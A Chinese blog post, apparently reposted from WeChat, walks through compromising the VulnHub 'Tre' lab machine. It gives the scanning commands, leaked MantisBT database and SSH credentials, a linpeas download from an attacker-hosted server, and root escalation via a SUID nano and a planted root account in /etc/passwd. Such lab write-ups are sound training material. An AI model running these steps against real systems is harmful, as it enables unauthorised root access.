vulnhub之Tre的实践

admin 2023年5月4日21:37:20评论30 views字数 1231阅读4分6秒阅读模式

今天实践的是vulnhub的Tre镜像,

下载地址,https://download.vulnhub.com/tre/Tre.zip,

用workstation导入,做地址扫描,

sudo netdiscover -r 192.168.177.0/24,有地址了,130就是,

vulnhub之Tre的实践

sudo nmap -sS -sV -T5 -A -p- 192.168.177.130,

vulnhub之Tre的实践

有web服务,做一下php文件扫描,

dirb http://192.168.177.130 /usr/share/wordlists/dirb/big.txt -X .php,

vulnhub之Tre的实践

浏览器访问http://192.168.177.130/adminer.php,

vulnhub之Tre的实践

继续做目录扫描,

dirb http://192.168.177.130 /usr/share/wordlists/dirb/big.txt,

vulnhub之Tre的实践

继续浏览器访问http://192.168.177.130/mantisbt/config,

vulnhub之Tre的实践

获取到用户名密码信息,

username: mantissuser
password: password@123AS
database: mantis

浏览器登录http://192.168.177.130/adminer.php,

vulnhub之Tre的实践

找到用户名密码的信息,

vulnhub之Tre的实践

获取到tre/Tr3@123456A!,

ssh登录,ssh [email protected],不是root,需要提权,

vulnhub之Tre的实践

linpeas查找root权限程序,

下载目前最新版本,wget https://github.com/carlospolop/PEASS-ng/releases/download/20230425-bd7331ea/linpeas.sh,

开个http下载服务,python2 -m SimpleHTTPServer,

进入临时目录,cd /tmp,

下载wget http://192.168.177.131:8000/linpeas.sh,

修改权限,chmod +x linpeas.sh,执行,./linpeas.sh,

vulnhub之Tre的实践

获取到/usr/bin/check-system,

查看权限,ls -la /usr/bin/check-system,

寻找nano,whereis nano,查看权限,ls -la /usr/bin/nano,

编辑check-system,/usr/bin/nano /usr/bin/check-system,

vulnhub之Tre的实践

加入chmod +s /usr/bin/nano,

vulnhub之Tre的实践

sudo -l查看,

vulnhub之Tre的实践

重启系统,sudo shutdown -r now,

重启后查看nano权限,ls -la /usr/bin/nano,

编辑passwd文件,/usr/bin/nano /etc/passwd,

加入hacker:sa3tHJ3/KuYvI:0:0:hacker:/root:/bin/bash

vulnhub之Tre的实践

切到hacker,su hacker,id确认是root,

vulnhub之Tre的实践


原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之Tre的实践

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年5月4日21:37:20
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnhub之Tre的实践http://cn-sec.com/archives/1704785.html

发表评论

匿名网友 填写信息